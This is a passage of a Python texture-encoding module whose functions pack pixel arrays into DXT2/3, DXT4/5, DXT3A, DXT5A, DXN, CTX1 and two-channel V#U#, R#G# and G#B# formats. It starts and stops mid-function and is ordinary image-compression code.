    """Pack an unpacked ARGB pixel array into DXT2/3 texels.

    Each 16-byte texel holds a 4-bit-per-pixel explicit alpha block
    followed by a DXT1-style pair of 16-bit 5:6:5 colors and 2-bit
    per-pixel color indices.  Delegates to the accelerated extension
    when it is available.

    Returns the repacked array of 32-bit unsigned ints.
    """
    # NOTE(review): the r/g/b channel offsets of +1/+2/+3 below assume
    # ucc == 4 (ARGB order) — confirm against the unpacker.
    ucc, bpt = arby.unpacked_channel_count, 16
    width, height, depth = ab.clip_dimensions(width, height, depth)
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
    pixels_per_texel = get_texel_pixel_count(width, height)
    channels_per_texel = ucc*pixels_per_texel

    a_scale, r_scale, g_scale, b_scale = arby.channel_downscalers
    repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
    unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)

    if fast_dds_defs:
        dds_defs_ext.pack_dxt2_3(
            repacked, unpacked,
            a_scale, r_scale, g_scale, b_scale, pixels_per_texel)
        return repacked

    # convert to tuples for faster access
    a_scale, r_scale, g_scale, b_scale = tuple(a_scale), tuple(r_scale),\
                                         tuple(g_scale), tuple(b_scale)

    #this is the indexing for each pixel in each texel
    #values are multiplied by 4 to account for the channels
    pixel_indices = range(0, channels_per_texel, ucc)

    # scratch lists for the two interpolated colors
    c_2 = [0,0,0,0]
    c_3 = [0,0,0,0]

    #shorthand names
    rpa = repacked
    upa = unpacked

    #loop for each texel
    for txl_i in range(0, len(repacked), 4):
        dist0 = dist1 = c_0i = c_1i = 0

        #cache so it doesn't have to keep being calculated
        pxl_i = (txl_i//4)*channels_per_texel
        r_pxl_i = pxl_i + 1
        g_pxl_i = pxl_i + 2
        b_pxl_i = pxl_i + 3

        # CALCULATE THE ALPHA
        # calculate alpha channel for DXT 2/3
        # coincidentally, the number of channels(4) matches the number of
        # bits in the alpha(4), so the shift is the same as the channel index
        alpha = sum(((a_scale[upa[pxl_i+i]]*15 + 7)//255) << i
                    for i in pixel_indices)
        rpa[txl_i] = alpha&0xFFffFFff
        rpa[txl_i+1] = alpha>>32

        # CALCULATE THE COLORS
        # compare distance between all pixels and find the two furthest apart
        # (we are actually comparing the area of the distance as it's faster)
        for i in pixel_indices:
            r = upa[i + r_pxl_i]
            g = upa[i + g_pxl_i]
            b = upa[i + b_pxl_i]
            for j in pixel_indices:
                if j <= i: continue
                dist1 = ((r - upa[r_pxl_i + j])**2+
                         (g - upa[g_pxl_i + j])**2+
                         (b - upa[b_pxl_i + j])**2)
                if dist1 > dist0:
                    dist0 = dist1
                    c_0i = i
                    c_1i = j

        # store furthest apart colors for use
        c_0 = upa[pxl_i + c_0i: pxl_i + c_0i + 4]
        c_1 = upa[pxl_i + c_1i: pxl_i + c_1i + 4]

        # quantize the colors down to 16 bit color and repack
        color0 = ((((r_scale[c_0[1]]*31+15)//255)<<11) |
                  (((g_scale[c_0[2]]*63+31)//255)<<5) |
                  (b_scale[c_0[3]]*31+15)//255)
        color1 = ((((r_scale[c_1[1]]*31+15)//255)<<11) |
                  (((g_scale[c_1[2]]*63+31)//255)<<5) |
                  (b_scale[c_1[3]]*31+15)//255)

        if color0 != color1:
            # if the current color selection doesn't match what
            # we want then we reverse which color is which
            if color0 < color1:
                c_0, c_1 = c_1, c_0
                color0, color1 = color1, color0

            idx = 0
            # the two interpolated colors at 1/3 and 2/3 between c_0 and c_1
            c_2[1] = (c_0[1]*2 + c_1[1])//3
            c_2[2] = (c_0[2]*2 + c_1[2])//3
            c_2[3] = (c_0[3]*2 + c_1[3])//3
            c_3[1] = (c_0[1] + c_1[1]*2)//3
            c_3[2] = (c_0[2] + c_1[2]*2)//3
            c_3[3] = (c_0[3] + c_1[3]*2)//3

            # calculate each pixel's closest match
            # and assign it the proper index
            for i in pixel_indices:
                r = upa[r_pxl_i+i]
                g = upa[g_pxl_i+i]
                b = upa[b_pxl_i+i]
                dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
                         (r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
                         (r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2,
                         (r-c_3[1])**2 + (g-c_3[2])**2 + (b-c_3[3])**2)
                idx += dists.index(min(dists))<<(i>>1)
            rpa[txl_i+3] = idx

        rpa[txl_i+2] = (color1<<16) | color0
    return repacked
def pack_dxt4_5(arby, unpacked, width, height, depth=1):
    """Pack an unpacked ARGB pixel array into DXT4/5 texels.

    Each 16-byte texel stores an interpolated alpha block (two 8-bit
    endpoints plus 3-bit per-pixel indices) followed by a DXT1-style
    pair of 16-bit 5:6:5 colors with 2-bit per-pixel indices.
    Delegates to the accelerated extension when it is available.

    Returns the repacked array of 32-bit unsigned ints.
    """
    # NOTE(review): the r/g/b channel offsets of +1/+2/+3 below assume
    # ucc == 4 (ARGB order) — confirm against the unpacker.
    ucc, bpt = arby.unpacked_channel_count, 16
    width, height, depth = ab.clip_dimensions(width, height, depth)
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
    pixels_per_texel = get_texel_pixel_count(width, height)
    channels_per_texel = ucc*pixels_per_texel

    a_scale, r_scale, g_scale, b_scale = arby.channel_downscalers
    repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
    unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)

    if fast_dds_defs:
        dds_defs_ext.pack_dxt4_5(
            repacked, unpacked, a_scale, r_scale, g_scale, b_scale,
            pixels_per_texel)
        return repacked

    # convert to tuples for faster access
    a_scale, r_scale, g_scale, b_scale = tuple(a_scale), tuple(r_scale),\
                                         tuple(g_scale), tuple(b_scale)

    #this is the indexing for each pixel in each texel
    #values are multiplied by 4 to account for the channels
    pixel_indices = range(0, channels_per_texel, ucc)

    c_0 = [0,0,0,0]
    c_1 = [0,0,0,0]
    c_2 = [0,0,0,0]
    c_3 = [0,0,0,0]

    #shorthand names
    rpa = repacked
    upa = unpacked

    #loop for each texel
    for txl_i in range(0, len(repacked), 4):
        dist0 = dist1 = c_0i = c_1i = alpha_idx = 0

        #cache so it doesn't have to keep being calculated
        pxl_i = (txl_i//4)*channels_per_texel
        r_pxl_i = pxl_i + 1
        g_pxl_i = pxl_i + 2
        b_pxl_i = pxl_i + 3

        # CALCULATE THE ALPHA
        #find the most extreme values
        alpha_vals = tuple(map(lambda i: a_scale[upa[pxl_i+i]], pixel_indices))
        alpha0 = max(alpha_vals)
        alpha1 = min(alpha_vals)

        if alpha0 == alpha1:
            # if they are the same number then
            # the indexing can stay at all zero
            pass
        elif alpha1 and alpha0 != 255:
            # if the most extreme values are NOT 0 or
            # 255, use them as the interpolation values
            # In this mode, value_0 must be greater than value_1
            alpha_dif = alpha0 - alpha1
            half_dif = alpha_dif//2
            # calculate and store which interpolated
            # index each alpha value is closest to
            for i in range(len(alpha_vals)):
                # 0 = c_0                 1 = c_1
                # 2 = (6*c_0 + c_1)//7    3 = (5*c_0 + 2*c_1)//7
                # 4 = (4*c_0 + 3*c_1)//7  5 = (3*c_0 + 4*c_1)//7
                # 6 = (2*c_0 + 5*c_1)//7  7 = (c_0 + 6*c_1)//7

                # calculate how far between both colors
                # that the value is as a 0 to 7 int
                tmp = ((alpha_vals[i] - alpha1)*7 + half_dif)//alpha_dif
                if tmp == 0:
                    alpha_idx |= 1<<(i*3)
                elif tmp < 7:
                    # Because the colors are stored in opposite
                    # order, we need to invert the index
                    alpha_idx |= (8-tmp)<<(i*3)
        else:
            # In this mode, value_0 must be less than or equal to value_1
            # if the most extreme values ARE 0 and 255 though, then
            # we need to calculate the second most extreme values
            alpha0 = 255
            alpha1 = 0
            for val in alpha_vals:
                # store if lowest int so far
                if val < alpha0 and val: alpha0 = val
                # store if greatest int so far
                if val > alpha1 and val != 255: alpha1 = val

            if alpha1:
                alpha_dif = alpha1 - alpha0
            else:
                alpha0 = alpha_dif = 0
                alpha1 = 255

            half_dif = alpha_dif//2

            # calculate and store which interpolated
            # index each alpha value is closest to
            for i in range(len(alpha_vals)):
                # there are 4 interpolated colors in this mode
                # 0 = c_0                 1 = c_1
                # 2 = (4*c_0 + c_1)//5    3 = (3*c_0 + 2*c_1)//5
                # 4 = (2*c_0 + 3*c_1)//5  5 = (c_0 + 4*c_1)//5
                # 6 = 0                   7 = 255
                comp = alpha_vals[i]
                if comp == 0:
                    # if the value is 0 we set it to index 6
                    alpha_idx |= 6<<(i*3)
                elif comp == 255:
                    # if the value is 255 we set it to index 7
                    alpha_idx |= 7<<(i*3)
                elif alpha_dif:
                    # calculate how far between both colors
                    # that the value is as a 0 to 5 int
                    tmp = ((comp - alpha0)*5 + half_dif)//alpha_dif
                    if tmp == 5:
                        alpha_idx |= 1<<(i*3)
                    elif tmp > 0:
                        alpha_idx |= (tmp+1)<<(i*3)

        rpa[txl_i] = ((alpha_idx<<16) + (alpha1<<8) + alpha0)&0xFFffFFff
        rpa[txl_i+1] = alpha_idx>>16

        # CALCULATE THE COLORS
        # compare distance between all pixels and find the two furthest apart
        # (we are actually comparing the area of the distance as it's faster)
        for i in pixel_indices:
            r = upa[r_pxl_i + i]
            g = upa[g_pxl_i + i]
            b = upa[b_pxl_i + i]
            for j in pixel_indices:
                if j <= i: continue
                dist1 = ((r - upa[r_pxl_i + j])**2+
                         (g - upa[g_pxl_i + j])**2+
                         (b - upa[b_pxl_i + j])**2)
                if dist1 > dist0:
                    dist0 = dist1
                    c_0i = i
                    c_1i = j

        # store furthest apart colors for use
        c_0 = upa[pxl_i + c_0i: pxl_i + c_0i + 4]
        c_1 = upa[pxl_i + c_1i: pxl_i + c_1i + 4]

        # quantize the colors down to 16 bit color and repack
        color0 = ((((r_scale[c_0[1]]*31+15)//255)<<11) |
                  (((g_scale[c_0[2]]*63+31)//255)<<5) |
                  (b_scale[c_0[3]]*31+15)//255)
        color1 = ((((r_scale[c_1[1]]*31+15)//255)<<11) |
                  (((g_scale[c_1[2]]*63+31)//255)<<5) |
                  (b_scale[c_1[3]]*31+15)//255)

        if color0 != color1:
            # if the current color selection doesn't match what
            # we want then we reverse which color is which
            if color0 < color1:
                c_0, c_1 = c_1, c_0
                color0, color1 = color1, color0

            idx = 0
            # the two interpolated colors at 1/3 and 2/3 between c_0 and c_1
            c_2[1] = (c_0[1]*2 + c_1[1])//3
            c_2[2] = (c_0[2]*2 + c_1[2])//3
            c_2[3] = (c_0[3]*2 + c_1[3])//3
            c_3[1] = (c_0[1] + c_1[1]*2)//3
            c_3[2] = (c_0[2] + c_1[2]*2)//3
            c_3[3] = (c_0[3] + c_1[3]*2)//3

            # calculate each pixel's closest match
            # and assign it the proper index
            for i in pixel_indices:
                r = upa[i + r_pxl_i]
                g = upa[i + g_pxl_i]
                b = upa[i + b_pxl_i]
                dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
                         (r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
                         (r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2,
                         (r-c_3[1])**2 + (g-c_3[2])**2 + (b-c_3[3])**2)
                idx += dists.index(min(dists))<<(i>>1)
            rpa[txl_i+3] = idx

        rpa[txl_i+2] = (color1<<16) | color0
    return repacked
def pack_dxt3a(arby, unpacked, width, height, depth=1):
    """Pack an unpacked pixel array into DXT3A texels.

    Each channel of the image gets its own 8-byte block of 4-bit
    values (the DXT3 explicit-alpha encoding applied per channel).

    Returns the repacked array of 32-bit unsigned ints.
    """
    width, height, depth = ab.clip_dimensions(width, height, depth)
    #this is how many texels wide/tall the texture is
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)

    #create a new array to hold the texels after we repack them
    ucc = arby.unpacked_channel_count
    assert arby.target_channel_count == ucc
    bpt = ucc*8
    scales = list(arby.channel_downscalers)
    repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
    unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
    pixels_per_texel = get_texel_pixel_count(width, height)
    channels_per_texel = ucc*pixels_per_texel
    pixel_indices = range(0, channels_per_texel, ucc)

    if False and fast_dds_defs:
        # NOT IMPLEMENTED
        dds_defs_ext.pack_dxt3a(repacked, unpacked, pixels_per_texel, *scales)
        return repacked

    #shorthand names
    rpa = repacked
    upa = unpacked

    # convert to tuples for faster access
    for i in range(len(scales)):
        scales[i] = tuple(scales[i])

    #loop for each texel
    for txl_i in range(0, len(repacked), 2):
        #cache so it doesn't have to keep being calculated
        pxl_i = (txl_i//(2*ucc))*channels_per_texel
        chan = (txl_i//2)%ucc
        scale = scales[chan]

        # CALCULATE THE ALPHA
        alpha = a_shift = 0
        for i in pixel_indices:
            # BUGFIX: read the channel this block is packing by offsetting
            # with chan (previously read upa[pxl_i + i], i.e. always
            # channel 0, while scaling with scales[chan]) — this matches
            # the upa[pxl_i+i+chan] indexing used by pack_dxt5a/pack_dxn
            alpha |= ((scale[upa[pxl_i + i + chan]]*15 + 7)//255) << a_shift
            a_shift += 4
        rpa[txl_i] = alpha&0xFFffFFff
        rpa[txl_i+1] = alpha>>32
    return repacked
def pack_dxt5a(arby, unpacked, width, height, depth=1):
    """Pack an unpacked pixel array into DXT5A texels.

    Each channel of the image gets its own 8-byte DXT5-style
    interpolated block: two 8-bit endpoints plus 3-bit per-pixel
    indices.  Returns the repacked array of 32-bit unsigned ints.
    """
    width, height, depth = ab.clip_dimensions(width, height, depth)
    #this is how many texels wide/tall the texture is
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)

    #create a new array to hold the texels after we repack them
    ucc = arby.unpacked_channel_count
    assert arby.target_channel_count == ucc
    bpt = ucc*8
    scales = list(arby.channel_downscalers)
    repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
    unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
    pixels_per_texel = get_texel_pixel_count(width, height)
    channels_per_texel = ucc*pixels_per_texel
    pixel_indices = range(0, channels_per_texel, ucc)

    if False and fast_dds_defs:
        # NOT IMPLEMENTED
        dds_defs_ext.pack_dxt5a(repacked, unpacked, pixels_per_texel, *scales)
        return repacked

    #shorthand names
    rpa = repacked
    upa = unpacked

    # convert to tuples for faster access
    for i in range(len(scales)):
        scales[i] = tuple(scales[i])

    #loop for each texel
    for txl_i in range(0, len(repacked), 2):
        #cache so it doesn't have to keep being calculated
        pxl_i = (txl_i//(2*ucc))*channels_per_texel
        # which channel this 8-byte block packs (blocks cycle through channels)
        chan = (txl_i//2)%ucc
        idx = 0
        scale = scales[chan]

        # downscaled values of this channel for every pixel in the texel
        vals = tuple(map(lambda i: scale[upa[pxl_i+i+chan]], pixel_indices))
        val0 = max(vals)
        val1 = min(vals)

        if val0 == val1:
            # if they are the same number then
            # the indexing can stay at all zero
            pass
        elif val1 and val0 != 255:
            # if the most extreme values are NOT 0 or
            # 255, use them as the interpolation values
            # In this mode, value_0 must be greater than value_1
            dif = val0 - val1
            half_dif = dif//2  # for round-to-nearest in the floor division
            # calculate and store which interpolated
            # index each value is closest to
            for i in range(len(vals)):
                # 0 = c_0                 1 = c_1
                # 2 = (6*c_0 + c_1)//7    3 = (5*c_0 + 2*c_1)//7
                # 4 = (4*c_0 + 3*c_1)//7  5 = (3*c_0 + 4*c_1)//7
                # 6 = (2*c_0 + 5*c_1)//7  7 = (c_0 + 6*c_1)//7

                # calculate how far between both colors
                # that the value is as a 0 to 7 int
                tmp = ((vals[i] - val1)*7 + half_dif)//dif
                if tmp == 0:
                    idx |= 1<<(i*3)
                elif tmp < 7:
                    # Because the colors are stored in opposite
                    # order, we need to invert the index
                    idx |= (8-tmp)<<(i*3)
        else:
            # In this mode, value_0 must be less than or equal to value_1
            # if the most extreme values ARE 0 and 255 though, then
            # we need to calculate the second most extreme values
            val0 = 255  # becomes the lowest non-zero value seen
            val1 = 0    # becomes the greatest non-255 value seen
            for val in vals:
                # store if lowest int so far
                if val < val0 and val: val0 = val
                # store if greatest int so far
                if val > val1 and val != 255: val1 = val

            if val1:
                dif = val1 - val0
            else:
                # all values were 0 and/or 255; endpoints collapse
                val0 = dif = 0
                val1 = 255

            half_dif = dif//2

            # calculate and store which interpolated
            # index each value is closest to
            for i in range(len(vals)):
                # there are 4 interpolated colors in this mode
                # 0 = c_0                 1 = c_1
                # 2 = (4*c_0 + c_1)//5    3 = (3*c_0 + 2*c_1)//5
                # 4 = (2*c_0 + 3*c_1)//5  5 = (c_0 + 4*c_1)//5
                # 6 = 0                   7 = 255
                comp = vals[i]
                if comp == 0:
                    # if the value is 0 we set it to index 6
                    idx |= 6<<(i*3)
                elif comp == 255:
                    # if the value is 255 we set it to index 7
                    idx |= 7<<(i*3)
                elif dif:
                    # calculate how far between both colors
                    # that the value is as a 0 to 5 int
                    tmp = ((comp - val0)*5 + half_dif)//dif
                    if tmp == 5:
                        idx |= 1<<(i*3)
                    elif tmp > 0:
                        idx |= (tmp+1)<<(i*3)

        # low dword: 48 bits of indices start at bit 16, endpoints in low 16
        rpa[txl_i] = ((idx<<16) | (val1<<8) | val0)&0xFFffFFff
        rpa[txl_i+1] = idx>>16
    return repacked
def pack_dxn(arby, unpacked, width, height, depth=1):
    """Pack an unpacked pixel array into DXN (two-channel) texels.

    Each 16-byte texel stores a DXT5-style interpolated block for the
    red channel and one for the green channel (two 8-bit endpoints
    plus 3-bit per-pixel indices each).  Returns the repacked array
    of 32-bit unsigned ints.
    """
    width, height, depth = ab.clip_dimensions(width, height, depth)
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)

    #create a new array to hold the texels after we repack them
    bpt = 16
    ucc = arby.unpacked_channel_count
    scales = list(arby.channel_downscalers)
    repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
    unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
    pixels_per_texel = get_texel_pixel_count(width, height)
    channels_per_texel = ucc*pixels_per_texel
    pixel_indices = range(0, channels_per_texel, ucc)

    if False and fast_dds_defs:
        # NOT IMPLEMENTED
        dds_defs_ext.pack_dxn(repacked, unpacked, pixels_per_texel, *scales)
        return repacked

    #shorthand names
    rpa = repacked
    upa = unpacked

    # convert to tuples for faster access
    for i in range(len(scales)):
        scales[i] = tuple(scales[i])

    #loop for each texel
    for txl_i in range(0, len(repacked), 2):
        #cache so it doesn't have to keep being calculated
        pxl_i = (txl_i>>2)*channels_per_texel
        idx = 0
        # figure out if we're packing red or green(1=red, 2=green)
        chan = (((txl_i>>1)+1)%2)+1
        scale = scales[chan]

        # downscaled values of this channel for every pixel in the texel
        vals = tuple(map(lambda i: scale[upa[pxl_i+i+chan]], pixel_indices))
        val0 = max(vals)
        val1 = min(vals)

        if val0 == val1:
            # if they are the same number then
            # the indexing can stay at all zero
            pass
        elif val1 and val0 != 255:
            # if the most extreme values are NOT 0 or
            # 255, use them as the interpolation values
            # In this mode, value_0 must be greater than value_1
            dif = val0 - val1
            half_dif = dif//2  # for round-to-nearest in the floor division
            # calculate and store which interpolated
            # index each value is closest to
            for i in range(len(vals)):
                # 0 = c_0                 1 = c_1
                # 2 = (6*c_0 + c_1)//7    3 = (5*c_0 + 2*c_1)//7
                # 4 = (4*c_0 + 3*c_1)//7  5 = (3*c_0 + 4*c_1)//7
                # 6 = (2*c_0 + 5*c_1)//7  7 = (c_0 + 6*c_1)//7

                # calculate how far between both colors
                # that the value is as a 0 to 7 int
                tmp = ((vals[i] - val1)*7 + half_dif)//dif
                if tmp == 0:
                    idx |= 1<<(i*3)
                elif tmp < 7:
                    # Because the colors are stored in opposite
                    # order, we need to invert the index
                    idx |= (8-tmp)<<(i*3)
        else:
            # In this mode, value_0 must be less than or equal to value_1
            # if the most extreme values ARE 0 and 255 though, then
            # we need to calculate the second most extreme values
            val0 = 255  # becomes the lowest non-zero value seen
            val1 = 0    # becomes the greatest non-255 value seen
            for val in vals:
                # store if lowest int so far
                if val < val0 and val: val0 = val
                # store if greatest int so far
                if val > val1 and val != 255: val1 = val

            if val1:
                dif = val1 - val0
            else:
                # all values were 0 and/or 255; endpoints collapse
                val0 = dif = 0
                val1 = 255

            half_dif = dif//2

            # calculate and store which interpolated
            # index each value is closest to
            for i in range(len(vals)):
                # there are 4 interpolated colors in this mode
                # 0 = c_0                 1 = c_1
                # 2 = (4*c_0 + c_1)//5    3 = (3*c_0 + 2*c_1)//5
                # 4 = (2*c_0 + 3*c_1)//5  5 = (c_0 + 4*c_1)//5
                # 6 = 0                   7 = 255
                comp = vals[i]
                if comp == 0:
                    # if the value is 0 we set it to index 6
                    idx |= 6<<(i*3)
                elif comp == 255:
                    # if the value is 255 we set it to index 7
                    idx |= 7<<(i*3)
                elif dif:
                    # calculate how far between both colors
                    # that the value is as a 0 to 5 int
                    tmp = ((comp - val0)*5 + half_dif)//dif
                    if tmp == 5:
                        idx |= 1<<(i*3)
                    elif tmp > 0:
                        idx |= (tmp+1)<<(i*3)

        # low dword: 48 bits of indices start at bit 16, endpoints in low 16
        rpa[txl_i] = ((idx<<16) | (val1<<8) | val0)&0xFFffFFff
        rpa[txl_i+1] = idx>>16
    return repacked
def pack_ctx1(arby, unpacked, width, height, depth=1):
    """Pack an unpacked pixel array into CTX1 texels.

    CTX1 is a two-channel (X/Y normal map) analog of DXT1: each 8-byte
    texel stores two 8:8 endpoint pairs and 2-bit per-pixel indices
    into the endpoints and two interpolated values.
    Returns the repacked array of 32-bit unsigned ints.
    """
    width, height, depth = ab.clip_dimensions(width, height, depth)
    dxt_width, dxt_height = clip_dxt_dimensions(width, height)
    texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)

    #create a new array to hold the texels after we repack them
    bpt = 8
    ucc = arby.unpacked_channel_count
    repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
    unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
    _, r_scale, g_scale, __ = arby.channel_downscalers
    pixels_per_texel = get_texel_pixel_count(width, height)
    channels_per_texel = ucc*pixels_per_texel
    pixel_indices = range(0, channels_per_texel, ucc)

    if False and fast_dds_defs:
        # NOT IMPLEMENTED
        dds_defs_ext.pack_ctx1(repacked, unpacked, r_scale, g_scale,
                               pixels_per_texel)
        return repacked

    #shorthand names
    rpa = repacked
    upa = unpacked

    # convert to tuples for faster access
    r_scale, g_scale = tuple(r_scale), tuple(g_scale)

    #loop for each texel
    for txl_i in range(0, len(repacked), 2):
        dist0 = dist1 = c_0i = c_1i = idx = 0
        # endpoint and interpolated x/y pairs for this texel
        xy_0 = [0,0,0,0]
        xy_1 = [0,0,0,0]
        xy_2 = [0,0,0,0]
        xy_3 = [0,0,0,0]

        #cache so it doesn't have to keep being calculated
        pxl_i = (txl_i//2)*channels_per_texel
        # NOTE(review): +1/+2 assumes channel order with x at offset 1
        # and y at offset 2 (ARGB-style) — confirm against the unpacker
        r_pxl_i = pxl_i + 1
        g_pxl_i = pxl_i + 2

        # compare distance between all pixels and find the two furthest apart
        #(we are actually comparing the area of the distance as it's faster)
        for i in pixel_indices:
            for j in pixel_indices:
                if j <= i: continue
                dist1 = ((upa[r_pxl_i + i] - upa[r_pxl_i + j])**2 +
                         (upa[g_pxl_i + i] - upa[g_pxl_i + j])**2)
                if dist1 > dist0:
                    dist0 = dist1
                    c_0i = i
                    c_1i = j

        # store furthest apart colors for use
        xy_0[0] = r_scale[upa[r_pxl_i + c_0i]]
        xy_0[1] = g_scale[upa[g_pxl_i + c_0i]]

        xy_1[0] = r_scale[upa[r_pxl_i + c_1i]]
        xy_1[1] = g_scale[upa[g_pxl_i + c_1i]]

        color0 = xy_0[0] | (xy_0[1]<<8)
        color1 = xy_1[0] | (xy_1[1]<<8)

        rpa[txl_i] = color0 | (color1<<16)

        if color0 != color1:
            # calculate the intermediate colors
            xy_2[0] = (xy_0[0]*2 + xy_1[0])//3
            xy_2[1] = (xy_0[1]*2 + xy_1[1])//3
            xy_3[0] = (xy_0[0] + xy_1[0]*2)//3
            xy_3[1] = (xy_0[1] + xy_1[1]*2)//3

            # calculate each pixel's closest match
            # and assign it the proper index
            for i in pixel_indices:
                x = r_scale[upa[r_pxl_i + i]]
                y = g_scale[upa[g_pxl_i + i]]
                dist0 = (x-xy_0[0])**2 + (y-xy_0[1])**2
                dist1 = (x-xy_1[0])**2 + (y-xy_1[1])**2

                # add appropriate indexing value to array
                if dist0 <= dist1: #closer to color 0
                    if dist0 > (x-xy_2[0])**2 + (y-xy_2[1])**2:
                        #closest to color 2
                        idx |= 2<<(i//2)
                elif dist1 < (x-xy_3[0])**2 + (y-xy_3[1])**2:
                    #closest to color 1
                    idx |= 1<<(i//2)
                else: #closest to color 3
                    idx |= 3<<(i//2)

        rpa[txl_i+1] = idx
    return repacked
def pack_v8u8(arby, unpacked, width, height, depth=1):
    """Pack to V8U8 via the generic VU packer with 8 bits per channel."""
    return pack_vu(arby, unpacked, width, height, depth, bpc=8)
def pack_v16u16(arby, unpacked, width, height, depth=1):
    """Pack to V16U16 via the generic VU packer with 16 bits per channel."""
    return pack_vu(arby, unpacked, width, height, depth, bpc=16)
def pack_vu(arby, unpacked, width, height, depth=1, bpc=8):
    """Pack an unpacked pixel array into two-channel signed V#U# data.

    Returns a new array with one packed element per source pixel.
    Raises TypeError when the image has fewer than 2 channels.
    """
    ucc = arby.unpacked_channel_count
    if ucc < 2:
        raise TypeError("Cannot convert image with less than 2 channels "
                        "to V%sU%s." % (bpc, bpc))

    pixel_bytes = (bpc * 2)//8
    typecode = ab.INVERSE_PIXEL_ENCODING_SIZES[pixel_bytes]
    packed = ab.bitmap_io.make_array(typecode, len(unpacked)//ucc)
    _, u_scale, v_scale, __ = arby.channel_downscalers

    # a 2-channel image is already just U and V; otherwise skip channel 0
    chan0, chan1 = (0, 1) if ucc == 2 else (1, 2)

    if fast_dds_defs:
        dds_defs_ext.pack_vu(packed, unpacked, u_scale, v_scale,
                             ucc, chan0, chan1)
        return packed

    # convert to tuples for faster access
    u_scale, v_scale = tuple(u_scale), tuple(v_scale)

    # RGB normal maps use unsigned chars, which maps to:
    #     [0, 255] -> [-1, 1]
    # V8U8 uses signed chars, which maps(as unsigned chars) to:
    #     [0, 127] -> [+0, 1]  and  [128, 255] -> [-1, -0]
    # Ones compliment is used here to simplify math and to allow
    # all components to have a zero point and to make both sides
    # of the zero point have an equal numbers of points.
    flip = 1 << (bpc - 1)
    flip |= flip << bpc
    for out_i, in_i in enumerate(range(0, len(unpacked), ucc)):
        packed[out_i] = (((v_scale[unpacked[in_i + chan1]]<<bpc) |
                          u_scale[unpacked[in_i + chan0]]) ^ flip)
    return packed
def pack_r8g8(arby, unpacked, width, height, depth=1):
    """Pack to R8G8 via the generic RG packer with 8 bits per channel."""
    return pack_rg(arby, unpacked, width, height, depth, bpc=8)
def pack_r16g16(arby, unpacked, width, height, depth=1):
    """Pack to R16G16 via the generic RG packer with 16 bits per channel."""
    return pack_rg(arby, unpacked, width, height, depth, bpc=16)
def pack_rg(arby, unpacked, width, height, depth=1, bpc=8):
    """Pack an unpacked pixel array into two-channel unsigned R#G# data.

    Returns a new array with one packed element per source pixel.
    Raises TypeError when the image has fewer than 2 channels.
    """
    ucc = arby.unpacked_channel_count
    if ucc < 2:
        raise TypeError("Cannot convert image with less than 2 channels "
                        "to R%sG%s." % (bpc, bpc))

    pixel_bytes = (bpc * 2)//8
    typecode = ab.INVERSE_PIXEL_ENCODING_SIZES[pixel_bytes]
    packed = ab.bitmap_io.make_array(typecode, len(unpacked)//ucc)
    _, r_scale, g_scale, __ = arby.channel_downscalers

    # a 2-channel image holds R and G directly; otherwise skip channel 0
    chan0, chan1 = (0, 1) if ucc == 2 else (1, 2)

    if False and fast_dds_defs:
        # NOT IMPLEMENTED YET
        dds_defs_ext.pack_rg(packed, unpacked, r_scale, g_scale,
                             ucc, chan0, chan1)
        return packed

    # convert to tuples for faster access
    r_scale, g_scale = tuple(r_scale), tuple(g_scale)

    for out_i, in_i in enumerate(range(0, len(unpacked), ucc)):
        packed[out_i] = ((g_scale[unpacked[in_i + chan1]]<<bpc) |
                         r_scale[unpacked[in_i + chan0]])
    return packed
def pack_g8b8(arby, unpacked, width, height, depth=1):
    """Pack to G8B8 via the generic GB packer with 8 bits per channel."""
    return pack_gb(arby, unpacked, width, height, depth, bpc=8)
def pack_g16b16(arby, unpacked, width, height, depth=1):
    """Pack to G16B16 via the generic GB packer with 16 bits per channel."""
    return pack_gb(arby, unpacked, width, height, depth, bpc=16)
def pack_gb(arby, unpacked, width, height, depth=1, bpc=8):
    """Pack an unpacked pixel array into two-channel unsigned G#B# data.

    Returns a new array with one packed element per source pixel.
    Raises TypeError when the image has fewer than 2 channels.
    """
    ucc = arby.unpacked_channel_count
    if ucc < 2:
        raise TypeError("Cannot convert image with less than 2 channels "
                        "to G%sB%s." % (bpc, bpc))

    pixel_bytes = (bpc * 2)//8
    typecode = ab.INVERSE_PIXEL_ENCODING_SIZES[pixel_bytes]
    packed = ab.bitmap_io.make_array(typecode, len(unpacked)//ucc)
    _, __, g_scale, b_scale = arby.channel_downscalers

    # a 2-channel image holds G and B directly; otherwise skip channel 0
    chan0, chan1 = (0, 1) if ucc == 2 else (1, 2)

    if False and fast_dds_defs:
        # NOT IMPLEMENTED YET
        dds_defs_ext.pack_gb(packed, unpacked, g_scale, b_scale,
                             ucc, chan0, chan1)
        return packed

    # convert to tuples for faster access
